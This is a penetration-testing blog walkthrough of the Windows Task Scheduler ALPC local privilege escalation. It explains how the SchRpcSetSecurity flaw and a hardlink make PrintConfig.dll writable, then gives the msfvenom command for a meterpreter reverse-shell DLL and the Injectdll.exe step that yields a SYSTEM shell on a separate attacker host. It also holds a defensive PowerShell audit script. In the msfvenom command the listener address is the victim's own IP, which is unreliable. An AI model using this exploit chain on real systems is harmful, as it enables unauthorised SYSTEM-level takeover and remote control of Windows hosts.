A local privilege escalation vulnerability exists in the Windows Task Scheduler service, through which a local unprivileged user can change the permissions of a file and obtain SYSTEM privileges. It has a CVSS score of 7.8. Replacing a system file and then waiting for a privileged process to access it escalates our privileges. The DLL (Dynamic Link Library) loaded by the Spoolsv.exe process can be made writable (through a hardlink), replaced, and then executed when Spoolsv.exe loads it.
Understanding the Scenario
A process running with User A's privileges must impersonate User B (the logged-on user) while it services a request from User B. This is the proper way to handle security context: the process running as User A impersonates User B, performs the action with User B's privileges, and, once the action is complete, reverts to its own privileges.
In the scenario here, however, the Task Scheduler is a process running with SYSTEM privileges. It should follow this impersonation pattern whenever it performs an action on behalf of a caller with different privileges, but it fails to do so. When User B (the logged-on user) calls the SchRpcSetSecurity method, the process should impersonate User B and perform the action as that user, but instead it uses its own SYSTEM privileges. We will leverage this flaw and try to exploit the condition.
Advanced Local Inter-Process Communication (ALPC)
ALPC is a high-speed, message-based communication mechanism implemented in the NT kernel. It can be used for communication between:
- Two user-mode processes.
- One user-mode process and one kernel-mode driver.
- Two kernel-mode drivers.
LPC is used only within the local system; it is never used remotely. Remote Procedure Call (RPC) is used for communication between two different systems. ALPC arrived in Windows Vista and deprecated LPC. ALPC works in a client/server model, and calls from client to server are asynchronous (the client does not block waiting for the server to respond). The Local Security Authority Subsystem Service (LSASS), the Session Manager (SMSS), and the Service Control Manager all use (A)LPC ports directly to communicate with client processes. Winlogon and the Security Reference Monitor use it to communicate with the LSASS process.
The Task Scheduler's SchRpcSetSecurity method can be called by any local process over Advanced Local Inter-Process Communication, and it sets a security descriptor on a file or folder. The method fails to impersonate the requesting client when setting the security descriptor, so the Access Control List (ACL) of an arbitrary file or folder can be changed with the Task Scheduler's SYSTEM privileges.
We will demonstrate the following through the POC (https://github.com/bharadwajyas/TasScheduler_ALPC-Exploit):
- Since any user can create a file under the C:\Windows\Tasks folder, the POC creates a .job file there that is a hardlink to PrintConfig.dll, a DLL trusted by the Spoolsv.exe process. The POC first locates PrintConfig.dll.
- The POC changes the permissions of UpdateTask.job by calling the Task Scheduler's SchRpcSetSecurity method. Because the .job file is a hardlink, modifying its permissions also updates the permissions of PrintConfig.dll, which becomes modifiable by the user.
- The DLL is replaced with a malicious DLL (which gives us a reverse shell on our attacker machine).
- The modified DLL is loaded and performs the attacker-defined actions.
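From a defender's side, the chain above leaves two checkable artifacts on the host: a file in C:\Windows\Tasks that is a hardlink to something outside that folder, and a system DLL whose DACL grants write rights to a low-privilege principal. The following PowerShell script, an added example that is not part of the original post or the POC repository, audits both conditions. It assumes PrintConfig.dll lives somewhere under the driver store (the post does not give its path, so the script searches for it), and it relies only on the built-in fsutil.exe and Get-Acl.

```powershell
# Added example (not from the original post or the POC): audit the two
# preconditions the walkthrough relies on. Run from an elevated prompt.

$TasksDir = 'C:\Windows\Tasks'
# Assumption: PrintConfig.dll is located under the driver store; we search
# for it rather than hard-coding a path the post never states.
$DriverStore = 'C:\Windows\System32\DriverStore\FileRepository'

# 1. A file in C:\Windows\Tasks that is a hardlink to a file outside that
#    directory is suspicious: legitimate .job files have exactly one name.
function Find-TasksHardLinks {
    Get-ChildItem -Path $TasksDir -File -Force -ErrorAction SilentlyContinue |
      ForEach-Object {
        # fsutil prints one path per link, relative to the volume root,
        # e.g. \Windows\Tasks\UpdateTask.job
        $links = & fsutil.exe hardlink list $_.FullName 2>$null
        $outside = $links | Where-Object { $_ -and ($_ -notlike '\Windows\Tasks\*') }
        if ($outside) {
            [pscustomobject]@{ File = $_.FullName; LinkedTo = ($outside -join '; ') }
        }
      }
}

# 2. A system DLL whose DACL lets a low-privilege principal write to it is
#    the condition the SchRpcSetSecurity step produces; report such ACEs.
$LowPrivPrincipals = @(
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'Everyone',
    'NT AUTHORITY\INTERACTIVE'
)
$WriteMask = [System.Security.AccessControl.FileSystemRights]::WriteData -bor
             [System.Security.AccessControl.FileSystemRights]::AppendData -bor
             [System.Security.AccessControl.FileSystemRights]::WriteAttributes -bor
             [System.Security.AccessControl.FileSystemRights]::Delete -bor
             [System.Security.AccessControl.FileSystemRights]::ChangePermissions -bor
             [System.Security.AccessControl.FileSystemRights]::TakeOwnership

function Find-WritableSystemDll {
    param([string]$Name = 'PrintConfig.dll')
    Get-ChildItem -Path $DriverStore -Recurse -Filter $Name -File -ErrorAction SilentlyContinue |
      ForEach-Object {
        $acl = Get-Acl -Path $_.FullName
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -eq 'Allow' -and
                ($LowPrivPrincipals -contains $ace.IdentityReference.Value) -and
                (([int]$ace.FileSystemRights -band [int]$WriteMask) -ne 0)) {
                [pscustomobject]@{
                    Dll       = $_.FullName
                    Principal = $ace.IdentityReference.Value
                    Rights    = $ace.FileSystemRights
                }
            }
        }
      }
}

Find-TasksHardLinks
Find-WritableSystemDll
```

On a clean host both functions return nothing. A hit from Find-TasksHardLinks shows the .job file and the path it shares data with; a hit from Find-WritableSystemDll shows which principal gained write, delete or permission-change rights on the DLL. The write mask deliberately includes ChangePermissions and TakeOwnership, since either is enough to regain full control even if the data-write bits are later removed.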
| Operating System | OS Version | Hotfix Applied | User Logged on | IPv4 |
|---|---|---|---|---|
| Kali Linux | Kali 2017.2 | | root | 192.168.245.145 |
| Windows 10 (x64) | Microsoft Windows 10 Enterprise 2016 LTSB (10.0.14393 N/A Build 14393) | | admin user (under-privileged user) | 192.168.245.134 |
Open Process Explorer with administrator privileges and have a look at the privileges of the spoolsv.exe process (SYSTEM).
The 'adminuser' account is a member of the Users group; we can verify this as follows:
net user adminuser
Now open a command prompt with normal privileges and launch Notepad from it.
We can see the spawned process in Process Explorer.
It is clearly visible that the Process ID of the notepad process is 5068 (note this, as we will soon use it in the exploit) and that it was spawned under the cmd.exe process. We will now head straight to the exploit and run the following command (note that we opened the PowerShell window with normal privileges).
After firing the exploit we find that Notepad is now running under the spoolsv.exe process with SYSTEM privileges.
We will embed our own malicious DLL in the main DLL file (the one injected into the spoolsv.exe process). Currently, ALPC-TaskSched-LPE.dll carries exploit.dll from the 'Resources' folder, which by default makes spoolsv.exe spawn the notepad process.
Using msfvenom we generate a malicious DLL that connects back to our attacking machine (the Kali box). As the target machine has a 64-bit architecture, we use the payload shown below.
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.245.134 lport=444 -f dll > lol.dll
CFF Explorer is a Portable Executable (PE) editor that supports the .NET framework; we use it to embed our malicious DLL in the final DLL (ALPC-TaskSched-LPE.dll). Embedding the malicious DLL in the original DLL file with CFF Explorer works as follows:
The CFF Explorer view looks like the figure below. Go to Resource Editor > RCDATA, then select the malicious DLL (lol.dll) to embed in the original DLL.
The contents of exploit.dll are shown below. RCDATA defines raw data for an application; raw data resources permit the inclusion of binary data directly in the executable file.
Select the malicious DLL from the console.
Overwrite the original file and save it. We overwrite the original DLL file because the POC exploit is written to load the DLL by the name ALPC-TaskSched-LPE.
Alternatively, we can load a DLL with a file name of our own by modifying the DLL's file name in the exploit.
The malicious DLL file is loaded from \x64\ALPC-TaskSched-LPE.dll.
Now we open a new PowerShell window with normal privileges and start our listener on the attacker box (Kali) on TCP port 444. Execute the following command, supplying the Process ID of the notepad process.
Injectdll.exe 5068 \x64\ALPC-TaskSched-LPE.dll
Process Explorer shows the newly spawned processes that connect back to the attacker machine (obtained after 5-10 retries).
And on the attacker machine, we got a SYSTEM shell!
We can spawn a shell and have a look at the privileges.
We can verify the connection from the victim machine through:
The exploit discussed above works on most of the latest Windows products, such as Windows 10 (32-bit and 64-bit) and Windows Server 2016. This blog is for educational purposes only and the author is not responsible for any misconduct by the viewers. Stay tuned for our next blog post. Till then, HacknPentest!!
Author: – Yash Bharadwaj
Maintained by: – Puneet Choudary